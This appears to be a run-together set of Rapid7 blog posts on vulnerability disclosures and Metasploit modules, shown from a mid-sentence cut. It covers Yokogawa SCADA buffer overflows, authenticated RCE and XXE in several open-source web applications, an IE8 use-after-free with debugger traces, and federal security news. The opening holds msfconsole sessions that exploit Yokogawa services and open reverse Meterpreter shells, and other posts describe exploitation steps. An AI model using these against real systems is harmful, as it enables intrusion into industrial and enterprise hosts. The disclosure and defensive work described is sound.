Sending 4/10... [*] Sending 5/10... [*] Sending 6/10... [*] Sending 7/10... [*] Sending 8/10... [*] Sending 9/10... [*] Sending 10/10... [*] Auxiliary module execution completed msf auxiliary(yokogawa_logsvr ) > R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 (including DEP bypass in case needed), where is possible to gain arbitrary code execution, with the CENTUM user privileges, by corrupting the SEH handler stored in the stack. By default, a run of the Metasploit module will return a shell on the targeted system: msf > use exploit/windows/scada/yokogawa_bkhodeq_bof msf exploit(yokogawa_bkhodeq_bof) > set rhost 192.168.172.133 rhost => 192.168.172.133 msf exploit(yokogawa_bkhodeq_bof) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(yokogawa_bkhodeq_bof) > set lhost 192.168.172.1 lhost => 192.168.172.1 msf exploit(yokogawa_bkhodeq_bof) > exploit [*] Started reverse handler on 192.168.172.1:4444 [*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ], sending 8689 bytes... [*] Sending stage (769024 bytes) to 192.168.172.133 [*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1185) at 2014-03-09 16:09:28 +0100 meterpreter > getuid Server username: HIS0163\CENTUM meterpreter > sysinfo Computer : HIS0163 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow Exploitation has been confirmed at least with the commands STOR, RETR and PMODE. By sending a command with a long argument it's possible to overflow the EIP saved on the stack and gain code execution since there isn't stack cookie protection on the vulnerable function. A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50, where is possible to gain arbitrary code execution, with the CENTUM user privileges, by sending a specially crafted RETR command. Again, shells are to be had: msf> use exploit/windows/scada/yokogawa_bkbcopyd_bof msf exploit(yokogawa_bkbcopyd_bof) > set RHOST 192.168.172.133 RHOST => 192.168.172.133 msf exploit(yokogawa_bkbcopyd_bof) > check [*] The target service is running, but could not be validated. msf exploit(yokogawa_bkbcopyd_bof) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(yokogawa_bkbcopyd_bof) > set LHOST 192.168.172.1 LHOST => 192.168.172.1 msf exploit(yokogawa_bkbcopyd_bof) > exploit [*] Started reverse handler on 192.168.172.1:4444 [*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 458 bytes... [*] Sending stage (770048 bytes) to 192.168.172.133 [*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1384) at 2014-03-03 12:20:54 -0600 meterpreter > getuid Server username: HIS0163\CENTUM meterpreter > sysinfo Computer : HIS0163 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.172.133 - Meterpreter session cosed. Reason: User exit Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Federal Friday - 2.28.14 - Flash Zero Day Targets Foreign Policy Sites

Federal Friday has come again, which means another week has passed us by. It's been a busy week for the Moose of Rapid7 with an imminent move for our Boston HQ for on the horizon. We also had a great week at RSA with SC…

Federal Friday has come again, which means another week has passed us by. It's been a busy week for the Moose of Rapid7 with an imminent move for our Boston HQ for on the horizon. We also had a great week at RSA with SC Magazine naming Nexpose the Best Vulerability Management Solution!The threat landscape has had a wild few days with a major security flaw for Apple desktops and iOS devices as well as another IE zero day being discovered. In addition, a detailed report from FireEye pointed out a zero day vulnerability in Flash (CVE-2014-0502). This particular vuln targeted 3 non-profit institutions; as visitors went to their sites they were redirected to a server hosting the zero day exploit. According to the post by FireEye this is a targeted attack on a specific sector intended to gain additional user data as well as any information regarding public-policy and defense. This nasty exploit targets computers with the following OS' and configurations:Windows XPWindows 7 and Java 1.6Windows 7 and out-of-date versions of MS Office 2007 or 2010Not to be outdone US-CERT released put out an Alert about Phishing campaigns that will be popping up and on-going through the tax season. It's bad enough that doing your taxes can be stressful, especially if you know you're going to have to write a check to Uncle Sam, but now you need to watch out for these targeted campaigns. Keep in mind, while they cast a wide net, these campaigns will have the look and feel of an email coming from the IRS. To help you protect yourself US-CERT listed the below steps:Do not follow links in unsolicited email messages.Visit the IRS page for instructions on how to report suspected tax season phishing messages.Keep antivirus software up to date.Refer to US-CERT's Security Tips on Recognizing and Avoiding Email Scams and Avoiding Social Engineering and Phishing Attacks for additional techniques and recommendations.Less than 30 days until the boys of summer are back (I'm going to get some heat around here for this)...

Seven FOSS Tricks and Treats (Part Two)

Adventures in FOSS Exploitation, Part Two: ExploitationThis is part two of a pair of articles about disclosing vulnerabilities in a set of FOSS projects, see part one for some background on these vulnerabilities in particular, and some general advice for FOSS developers and maintainers.A…

Adventures in FOSS Exploitation, Part Two: ExploitationThis is part two of a pair of articles about disclosing vulnerabilities in a set of FOSS projects, see part one for some background on these vulnerabilities in particular, and some general advice for FOSS developers and maintainers.A while back, I started a project to go over some of the top Sourceforge web applications and try to write some Metasploit modules for them. In the end, I was able to write seven new Metasploit modules (six exploits and one aux). Some of the modules take advantage of intended functionality, such as the Moodle module. Others take advantage of true security flaws, such as the Openbravo XXE module. I will go into detail for each module in this blog post.I would like to especially thank todb for handling the vuln reporting for these modules, as I am lazy and just want to hack stuff. Props!Moodle Authenticated Remote Command Execution (CVE-2013-3630)Moodle is an open-source Learning Management System or Course Management System. It is used around the world by educational institutions, private enterprises, and governments alike and is a very good example of a solid open-source project. This year, as of this writing, Moodle has been downloaded from Sourceforge over 800,000 times. However, Moodle is easily installed from apt and yum as well.This module exploits more of a design flaw than a bug as the feature that is abused is meant to be there. This means that this isn't actually going to be fixed, but I will discuss mitigation later.The module also has the ability to exploit a vulnerability. Moodle was recently found to have an XSS bug that allows a student (unprivileged user) to steal an admin's session key (the "sesskey"). You can log in with less-privileged credentials, but supply a sesskey for an admin. This allows the unprivileged user to have the authorization of the admin, which in turn allows the user to pop a shell. You can read more about this XSS vulnerabilities on Exploit-DB.So, down to the knitty-gritty, how do you pop the shell? Within Moodle, an Administrator has the ability to specify a system path to the aspell binary on the filesystem that the TinyMCE editor will use for spell-checking. You can probably already see where this is going.Basically, an attacker can specify an arbitrary command, ensure the editor will use the system aspell, and make a request to ask for a spell check. By default, it is not set to the correct value and you will need to ensure it is using the system aspell.When the request for a spell check is made, the command is run in the context of the web application. If you specify the username and password of any user, and a sesskey of an admin, the exploit will work in the exact same way.You can use the config value "$CFG-> preventexecpath = true" to mitigate this risk.Disclosure Timeline (Moodle)Sat Aug 03, 2013: Initial discovery by internal researcherSat Aug 03, 2013: Draft Metasploit module writtenMon Aug 26, 2013: Initial contact to vendorMon Aug 27, 2013: Bug filed at Moodle bug tracker as MDL-41449Wed Oct 30, 2013: Public DisclosureVtiger CRM Authenticated Remote Code ExecutionThis web application has been downloaded over 200,000 times this year from Sourceforge.I found that an authenticated user (default creds admin:admin) could upload PHP source files with an extension of .php3 (.php was blocked) after manipulating a URL that the user is taken to during image uploading.By altering the URL (is read-only, need to copy to new tab), you could navigate to an upload folder with less file restrictions than the image upload folder, and by uploading a PHP script to this folder, you could access the script remotely to have it run the arbitrary PHP code.There are two vulnerabilities here that lead to successful exploitation. The first is that a user could navigate to an upload directory with less restrictions on allowed filetypes (non-images). The second is that this used an incomplete blacklist (restrict .php but not .php3).You can access the newly uploaded file directly on the web server and execute any PHP code you want.Once I realised the workflow for exploitation, a Metasploit module was cake . The module is effective against versions 5.3.0 and 5.4.0 of VTiger CRM.Disclosure Timeline (vTiger CRM)2013-07-01: Vulnerability discovered by Brandon Perry, Rapid72013-07-01: Metasploit module written2013-07-02: Disclosure first draft written2013-07-03: Vendor contacted with disclosure and Metasploit module2013-07-23: CERT/CC contacted with disclosure and Metasploit module2013-09-05: Planned Public disclosure (delayed)2013-10-30: Public disclosureZabbix Authenticated Remote Command Execution (CVE-2013-3628)Zabbix is an enterprise-class open-source software for monitoring networks, similar to Nagios. It has been downloaded on Sourceforge almost 300,000 times this year so far.This module abuses functionality within the application which allows an administrator to run scripts on hosts. By creating a host with an IP of 127.0.0.1 (it can already exist, will make two), then you can create a 'script' with an arbitrary command to be run on the Zabbix server, and call script_exec.php with the ID of the new host and the ID of the new script. This module uses the same vector of command execution as the module pyoor just got pushed into the framework, but uses real authentication as opposed to a SQL injection. This means mine will still work after the patch, with correct credentials. As it turns out, I found the vector around the same time as another researcher (Lincoln of corelan), independently. Funny how things like that work sometimes.Disclosure Timeline (Zabbix)Sat Aug 24, 2013: Initial discovery by internal researcherSat Aug 24, 2013: Draft Metasploit module writtenMon Aug 26, 2013: Initial contact to vendorWed Aug 28, 2013: Response from vendor, details providedWed Sep 11, 2013: Disclosure to CERT/CCWed Oct 30, 2013: Public DisclosureOpenbravo ERP Authenticated XXE (CVE-2013-3617)Openbravo ERP is an open source project available on Sourceforge, downloaded over 134,000 times this year. It was vulnerable to an XXE (XML eXternal Entity) attack the the XML API. This allows an authenticated user to post specially-crafted XML to the XML API and read arbitrary files from the file system as the user the application is running as (generally not root).If you aren't familiar with what an XXE attack is, I will explain it briefly. A great resource to read up more fully on this type of vulnerability is on the OWASP website.Basically, the default SAX parser used by many Java applications by default validates and expands entities defined within an external DTD. An attacker can create an external DTD within the XML request to a web service that will define new entities and where to look for them if referenced. When this request is parsed, the entities will be expanded on the server side to the values they are set to be expanded to. You can set these to expand to local files on the file system, thus replacing the entity with the contents of the file. This is the basic premise of the attack.Openbravo ERP is a Java application that provides an XML API to authenticated users. This is available at the URI /ws/dal/<ENDPOINT>. Each endpoint represents a specific entity within the Openbravo data access layer. The module by default uses the ADUser endpoint because you will eventually find a user you can edit (yourself) and persist with the new value. Each class represented by the endpoints seem to all share at least one property, a comment. This field seems to be postable with free form text across all the endpoints I tried (Product is another). The module uses this field to store the value of the file, then requests the updated entity from the endpoint with a GET and parses the comment field. I do try to remain stealthy, so I remove the file from the comments field when done. You have ability to set the endpoint you want to use in the options for the module (ENDPOINT, be default ADUser).Disclosure Timeline (Openbravo ERP)Mon Jul 22, 2013: Initial discovery by internal researcherMon Jul 29, 2013: Draft advisory writtenTue Aug 06, 2013: Initial contact to vendorTue Aug 06, 2013: Automatic response for issue 22813Tue Aug 13, 2013: PGP key provided, disclosure sent to vendorWed Aug 26, 2013: Disclosure to CERT/CCThu Aug 27, 2013: VU#533894 assigned by CERT/CCWed Sep 04, 2013: Planned public disclosure (Delayed)Wed Oct 30, 2013: Public DisclosureWed Oct 30, 2013: CERT/CC VU publishedISPConfig Authenticated Remote Code Execution (CVE-2013-3629)ISPConfig is an open source hosting control panel written in PHP that allows for easy management of resellers and clients of internet cloud space and the like.An administrator (default creds admin:admin) on ISPConfig has the ability to import and export language definition files. These files contain snippets of PHP code that get evaluated and executed in order to persist the correct language values. An attacker can abuse this by uploading a specially crafted file with arbitrary PHP code.The Metasploit module I have written to take advantage of this is called ispconfig_php_exec and allows the attacker to define the language that will inevitably be over-written (so don't choose the main language, otherwise it will be apparent something is wrong). While the vendor has stated they have added mitigations to later versions than 3.0.5.2 (which I was testing on at first), the module still works against the latest release.Disclosure Timeline (ISPConfig)Mon Jul 29, 2013: Initial discovery by internal researcherMon Aug 29, 2013: Draft Metasploit module writtenMon Aug 26, 2013: Initial contact to vendorTue Aug 27, 2013: Vendor response with PGP keyTue Aug 27, 2013: Vendor provided with full detailsWed Sep 04, 2013: Vendor provided a fixWed Sep 12, 2013: Disclosure to CERT/CCWed Oct 30, 2013: Public DisclosureOpenMediaVault Authenticated Remote Command Execution (CVE-2013-3632)OpenMediaVault is an open-source Debian distribution for network attached storage devices. Available on Sourceforge, it has been download over 500,000 times this year as of this writing.OpenMediaVault allows you to create cron jobs as users (including root). This module abuses this to create a cron job to run whatever arbitrary command the authenticated attacker (default creds admin:openmediavault) wants to run.Disclosure Timeline (OpenMediaVault)Thu Aug 01, 2013: Initial discovery by internal researcherThu Aug 01, 2013: Draft Metasploit module writtenMon Aug 26, 2013: Initial contact to vendorTue Aug 27, 2013: Vendor response with PGP keyTue Aug 27, 2013: Vendor provided with full detailsWed Sep 11, 2013: Vendor responseWed Sep 12, 2013: Disclosure to CERT/CCWed Oct 30, 2013: Public DisclosureNAS4Free Authenticated Remote Code Execution (CVE-2013-3631)NAS4Free is an open-source BSD distribution for network attached storage devices. Available on Sourceforge, it has been downloaded nearly 350,000 times this year as of this writing. NAS4Free is a direct continuation of development of FreeNAS, just under a different name (due to legal circumstances).A feature offered by NAS4Free to authenticated users (default creds admin:nas4free) is to run arbitrary PHP code (what could go wrong?). It also offers to run bash commands, but the bash environment is very limited and no connect-backs were viable via this vector.This module simply takes advantage of this feature to pop a shell with PHP. I noticed that PHP meterpreter did not work properly, and settled on using the more simple php/reverse_php payload for most of my testing.Disclosure Timeline (NAS4Free)Fri Aug 02, 2013: Initial discovery by internal researcherFri Aug 05, 2013: Draft Metasploit module writtenMon Aug 26, 2013: Initial contact to vendorWed Aug 28, 2013: Disclosure to vendorWed Sep 12, 2013: Disclosure to CERT/CCWed Oct 30, 2013: Public DisclosureWed Oct 30, 2013: CERT/CC VU published

Federal Friday - 10.18.2013 - The "We're Back In Business" Edition

After a tough start to FY14, a sense of normalcy should start to creep back in over the coming weeks. Even though the folks in the House and Senate merely delayed their budgetary discussions, we can only hope that some hard lessons were learned this…

After a tough start to FY14, a sense of normalcy should start to creep back in over the coming weeks. Even though the folks in the House and Senate merely delayed their budgetary discussions, we can only hope that some hard lessons were learned this time around and that come January our collective backs won't be up against the wall again. Unfortunately the under-valued thespian, Nicolas Cage, won't be representing my feelings in this week's blog as we have some things to talk about.One of the big concerns stemming from the shutdown was who was deemed essential and who wasn't. Unfortunately for most agencies their cyber teams were not considered essential, with some exceptions. All in all though, we were left fairly exposed during the shutdown for a number of reasons. While skeleton crews were in place to keep systems running and monitor the networks, the human element was effectively taken away for 3 weeks. They were made to rely on instead, a single individual to monitor complex security deployments that typically requires a team of specifically trained individuals to run effectively. Additionally, due to the extended length of the shutdown, attackers were given plenty of time to search for vulnerable critical systems.  While strict firewall standards may be in place, the maintenance (updates, patching etc.) have gone unchecked.  There was also a release of two IE Zero Days patches during the 16 days Washington was closed which could have a major impact if they remain unpatched, potentially putting networks of all sizes at risk.The other issue, which I find astounding, is that by leaving behind "essential" employees you have given skilled Phishers their prime targets. Highlighting the importance of these individuals like giving Ahab a white whale fish finder in Moby Dick. My suggestion upon returning back to work, aside from the mountains of catch-up you will be doing, is to run some social engineering campaigns against those employees that were tasked to be in-office during the shutdown. If they're vulnerable to your tactics they could then be a honey-pot for future attacks, especially given the "essential" tag they've been given.There were two great articles on the hit Cybersecurity took during the lockout which you can find here and here.To make sure you end your week the right way we have the return of the Panda Cam, so sit back and watch as these cuddly creatures possibly make an appearance (no guarantees).

IE 0-day: exploit code is now widely available (CVE-2013-3893)

Any newly discovered Internet Explorer zero day vulnerability is bad for users. But once the exploit code gets around to public disclosure sites, it's so much worse. In the past day or so exploit code has been submitted to virustotal.com and scumware.org. …

Any newly discovered Internet Explorer zero day vulnerability is bad for users. But once the exploit code gets around to public disclosure sites, it's so much worse. In the past day or so exploit code has been submitted to virustotal.com and scumware.org. Users and administrators should take immediate action to mitigate the risk posed by CVE-2013-3893.  Considering the timing, I personally expect to see an out of band patch from Microsoft before October's patch Tuesday, but that is just speculation.  Exploitation in the wild still seems limited to IE 8 and 9, and the exploit which is circulating seems to also rely on MS Office to be present (not clear why, as yet).  However, all versions of IE are affected by this issue, which means that this vulnerability has likely been present since IE 6 was released in 2001.  The fact that it is getting attention now is either due to a noticeable volume or impact of active exploitation in the wild. It may have just been discovered last week, or it may have been in the private toolkit of the world's best malware writers for more than a decade.   This is about to become as severe as any browser issue can be.  There were reports of regionally restricted public exploitation of the issue, but now that the exploit code is in the wild it's only a matter of time before it appears in commercial malware packs and broader exploitation. The vulnerability allows the attacker to gain the privileges of the user. All too often on Windows that means Administrator level privileges, but I would speculate that the exploit looking for MS Office could mean that it is being used with another privilege elevation vulnerability in Office. The mantra "I only visit safe sites" is a false promise of protection, as it's far too easy to misdirect, redirect, or otherwise cause a user to interact with a site that they are not expecting to.  Legitimate sites may also be compromised to host malware serving this exploit.  The simplest way to avoid this risk is to use a browser other than Internet Explorer.  Users who must use Internet Explorer should install all available Internet Explorer patches, and only use the latest versions available.  Neither of those things will directly help with this specific issue, but are good practices and pre-requisites for the following actions to be at all effective.   To mitigate the risk of exploitation from this issue, install EMET 4.0, configure it to force ASLR, and enable a number of heap spraying and ROP protections.  Additionally, there is a "fixit" available from Microsoft which will attempt to modify the system to prevent exploitation.  Fixits are not full-fledged patches which have gone through Microsoft's generally rigorous quality assurance, so there is a risk that it's not a complete solution or that it could cause compatibility issues with other products (details on both can be found here.) Personally I would do both: install and configure EMET, and apply the fixit.

Metasploit Update: Weaponizing Local Exploits

Weaponizing Local ExploitsThis week's update features an exploit for Tavis @taviso Ormandy's vulnerability in the EPATHOBJ::pprFlattenRec function, which lives in win32k.sys on pretty much any Windows machine you're likely to run into. A whole lot of people threw in on this module to…

Weaponizing Local ExploitsThis week's update features an exploit for Tavis @taviso Ormandy's vulnerability in the EPATHOBJ::pprFlattenRec function, which lives in win32k.sys on pretty much any Windows machine you're likely to run into. A whole lot of people threw in on this module to make this exploit reliable in Metasploit -- Tavis and progmboy wrote the original C exploit, new contributor @Keebie4e ported it to a Metasploit module, then a whole bunch of people threw in (and continue to do so) to make this exploit more and more stable. You can follow along at home by scrolling through PR #2036. I don't usually point at specific pull requests, but this one offers a pretty neat glimpse into how vulns become modules around here. If you're interested in exploit development, these are the kinds of discussions that are invaluable to follow along with.Oh, and incidentally, there's no patch yet for this particular issue, so it's effectively 0-day. While it's "only" a privilege escalation, penetration testers pretty routinely need some way to elevate from a local user privilege level to local system (and from there, it's but a hop skip and jump away from Domain Administrator, thanks to the miracle of Mimikatz credential dumping.Further, consider the power of an exploit like this when combine with, say, the latest Java Exploit from Adam Gowdiak and Matthias Kasier. What this means is that any malicious web server out on the Internet has a pretty straight shot at a whole lot of internal Windows networks.That's pretty bad. Many, many domain administrators are now at the mercy of the next (secret, unpublished) client-side exploit. Hopefully, with the publication of this vulnerability, defenders (and Microsoft) will come up with a decent solution sooner rather than later. In the meantime, it seems like offensive security has the upper hand at the moment. Now might be a good time to check your defense in depth strategies...New ModulesWe've got five new modules this week, including the two referenced above. What can I say, the security community tends to get a little quiet in early July, as everyone finalizes their Bsides / BlackHat / DefCon material.SMTP Open Relay Detection by Campbell MurrayJava Applet ProviderSkeleton Insecure Invoke Method by Adam Gowdiak and Matthias Kaiser exploits CVE-2013-2460Carberp Web Panel C2 Backdoor Remote PHP Code Execution by Steven K, bwall(Brian Wallace), and connection(Luis Santana)Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation by sinn3r, juan vazquez, egyp7, Keebie4e, Meatballs, Tavis Ormandy, and progmboy exploits CVE-2013-3660Windows Manage Trojanize Support Account by salchoAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Department of Labor IE 0-day Exploit (CVE-2013-1347) Now Available at Metasploit

Recently, the U.S. Department of Labor website was compromised and had been serving malicious code, capable of detecting and disabling some antivirus products such as Avira, F-Secure, Kaspersky, AVG, Sophos, etc.  It would also attack Internet Explorer 8 users with an 0-day exploit.  The…

Recently, the U.S. Department of Labor website was compromised and had been serving malicious code, capable of detecting and disabling some antivirus products such as Avira, F-Secure, Kaspersky, AVG, Sophos, etc.  It would also attack Internet Explorer 8 users with an 0-day exploit.  The Metasploit vulnerability research community was particularly interested in the exploit part, therefore that's what we'd like to talk about in this blog. Understanding how the evolving browser security landscape operates is key to formulating defense strategies, after all. First off, according to Microsoft's advisory, only Internet Explorer 8 is vulnerable to this exploit, and we verified that with a fully patched Windows 7 with IE8.  If you are looking for an excuse to upgrade to something more recent, the following image demonstrates IE8's weakness: ![](/content/images/post-images/17009/Screen Shot 2013-05-04 at 11.44.20 PM.png) Some people say this is a CVE-2012-4792 (a patched vulnerability), we beg to differ.  CVE-2012-4792 is a cbutton use-after-free, but the DoL exploit doesn't use this object at all (Exodus has an excellent writeup about that vulnerability).  Instead, a mshtml!CGenericElement::`vtable' is created while appending a datalist element: Allocating 0x4C bytes from InsertElementInternal: 0x0563cfb0 ... 0:008> !heap -p -a poi(0x0563cfb0) address 06a99fc8 found in _DPH_HEAP_ROOT @ 151000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 5087390: 6a99fc8 38 -  6a99000 2000 mshtml!CGenericElement::`vftable'     7c918f01 ntdll!RtlAllocateHeap 0x00000e64     635db42e mshtml!CGenericElement::CreateElement 0x00000018     635a67f5 mshtml!CreateElement 0x00000043     637917c0 mshtml!CMarkup::CreateElement 0x000002de     63791929 mshtml!CDocument::CreateElementHelper 0x00000052     637918a2 mshtml!CDocument::createElement 0x00000021     635d3820 mshtml!Method_IDispatchpp_BSTR 0x000000d1     636430c9 mshtml!CBase::ContextInvokeEx 0x000005d1     63643595 mshtml!CBase::InvokeEx 0x00000025     63643832 mshtml!DispatchInvokeCollection 0x0000014b     635e1cdc mshtml!CDocument::InvokeEx 0x000000f1     63642f30 mshtml!CBase::VersionedInvokeEx 0x00000020     63642eec mshtml!PlainInvokeEx 0x000000ea     633a6d37 jscript!IDispatchExInvokeEx2 0x000000f8     633a6c75 jscript!IDispatchExInvokeEx 0x0000006a     633a9cfe jscript!InvokeDispatchEx 0x00000098 And freed during garbage collection: 0:008> !heap -p -a poi(0x0563cfb0) address 06a99fc8 found in _DPH_HEAP_ROOT @ 151000 in free-ed allocation (  DPH_HEAP_BLOCK: VirtAddr VirtSize) 5087390: 6a99000 2000 7c927553 ntdll!RtlFreeHeap 0x000000f9     636b52c6 mshtml!CGenericElement::`vector deleting destructor' 0x0000003d 63628a50 mshtml!CBase::SubRelease 0x00000022     63640d1b mshtml!CElement::PrivateRelease 0x00000029     6363d0ae mshtml!PlainRelease 0x00000025     63663c03 mshtml!PlainTrackerRelease 0x00000014     633a10b4 jscript!VAR::Clear 0x0000005c     6339fb4a jscript!GcContext::Reclaim 0x000000ab     6339fd33 jscript!GcContext::CollectCore 0x00000113     63405594 jscript!JsCollectGarbage 0x0000001d     633a92f7 jscript!NameTbl::InvokeInternal 0x00000137     633a6650 jscript!VAR::InvokeByDispID 0x0000017c     633a9c0b jscript!CScriptRuntime::Run 0x00002989     633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack 0x000000ff     633a59f7 jscript!ScrFncObj::Call 0x0000008f     633a5743 jscript!CSession::Execute 0x00000175 Even though the CGenericElement vftable is freed, the reference is stil kept: 0:008> dc 0x0563cfb0; .echo; dc poi(0x0563cfb0) 0563cfb0  06a99fc8 00000000 ffff0075 ffffffff  ........u....... 0563cfc0  00000071 00000000 00000000 00000000  q............... 0563cfd0  00000000 0563cfd8 00000152 00000001  ......c.R....... 0563cfe0  00000000 00000000 0563cfc0 00000000  ..........c..... 0563cff0  00000010 00000000 00000000 d0d0d0d0  ................ 0563d000  ???????? ???????? ???????? ????????  ???????????????? 0563d010  ???????? ???????? ???????? ????????  ???????????????? 0563d020  ???????? ???????? ???????? ????????  ???????????????? 06a99fc8  ???????? ???????? ???????? ????????  ???????????????? 06a99fd8  ???????? ???????? ???????? ????????  ???????????????? 06a99fe8  ???????? ???????? ???????? ????????  ???????????????? 06a99ff8  ???????? ???????? ???????? ????????  ???????????????? 06a9a008  ???????? ???????? ???????? ????????  ???????????????? 06a9a018  ???????? ???????? ???????? ????????  ???????????????? 06a9a028  ???????? ???????? ???????? ????????  ???????????????? 06a9a038  ???????? ???????? ???????? ????????  ???????????????? And of course, this invalid reference ends up with a crash when used by mshtml!CElement::Doc(): 0:008> g (5f4.2c0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=63aae200 ebx=0563cfb0 ecx=06a99fc8 edx=00000000 esi=037cf0b8 edi=00000000 eip=6363fcc4 esp=037cf08c ebp=037cf0a4 iopl=0 nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00010246 mshtml!CElement::Doc: 6363fcc4 8b01 mov eax,dword ptr [ecx]  ds:0023:06a99fc8=???????? As of now, we are not aware of any patch from Microsoft specifically for IE8, but we will be updating this blog as soon as we hear something.  If you're a current IE8 user, then please consider the following workarounds: For newer Windows, upgrade to Internet Explorer 9 or 10. For Windows XP users, please use other browsers such as Google Chrome or Mozilla Firefox. If for some reason you must use Internet Explorer 8, please use EMET.  Or, you can also try setting IE's security zone to High, and customize your Active Scripting settings. Note that while Microsoft's advisory also suggests setting IE8's Internet security zones to 'High' for ActiveX controls, this, by itself, will not mitigate -- the exploitation technique used here does not leverage ActiveX controls at all. So, while that is generally good advice, it will not help in this case. If you'd like to try out this Metasploit module to better validate your defenses, please feel free to download Metasploit here.  If you already have Metasploit Framework, you may just use the msfupdate utility to receive this module.  For Metasploit Pro users, you will see this module in the upcoming update. Special thanks to: EMH TimelineMay 3rd - Microsoft advisory 2847140, no patch yet.May 5th - Metasploit releases ie_cgenericelement_uaf exploitMay 8th - Microsoft releases "fix-it"May 14th - Microsoft releases MS13-038 patch

Exploit Trends: Top 10 Searches for Metasploit Modules in October

Time for your monthly dose of Metasploit exploit trends! Each month we gather this list of the most searched exploit and auxiliary modules from the Metasploit database. To protect users' privacy, the statistics come from analyzing webserver logs of searches, not from monitoring Metasploit usage.…

Time for your monthly dose of Metasploit exploit trends! Each month we gather this list of the most searched exploit and auxiliary modules from the Metasploit database. To protect users' privacy, the statistics come from analyzing webserver logs of searches, not from monitoring Metasploit usage.October was a quiet month for exploit headlines, so not a whole lot of action on the list. The high traffic to Java and IE modules from their respective 0-days settled down, so you'll see some shuffling of order from that. Check out October's exploit and auxiliary modules below, annotated with Tod Beardsley's commentary.1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It's also got a great pile of language pack targets. All of Metasploit's exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it's reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft's Security TechCenter. Up three places from #4 last month.2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody's gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Up three places from #5 last month.3.  Java 7 Applet Remote Code Execution: Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshow. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. Down one place from #2 last month.4.  Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It's now pretty much a case study in stack buffer overflows in Windows, so it's got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Up two places from #6 last month.5. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability: This bug started off with Eric Romang's blog post and ended up with a module being cooked up over a weekend by Eric, @binjo, and the Metasploit exploit dev team. This event, like the Java 0-day, had the net effect of speeding up the vendor's patch schedule. If there was no public, open exploit, would there have been a patch so rapidly? Was it connected with Java 0-day? Who's the primary source for these critical client-side bugs, anyway? These and other questions are still being speculated on and debated in the security industry and security press. Down two places from #3 last month.6. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. I'd bet it's the most-used module in classroom and test environments. More on this topic in at the National Vulnerability Database. Up two places from #8 last month.7. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: Not sure why this module is still popular -- it's a client side DoS. Historically, it's a neat DoS, since it demos a bug in Windows 7's kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. Up three places from #10 last month.8. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft's Security TechCenter. Down one place from #7 last month.9. PHP CGI Argument Injection: This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET 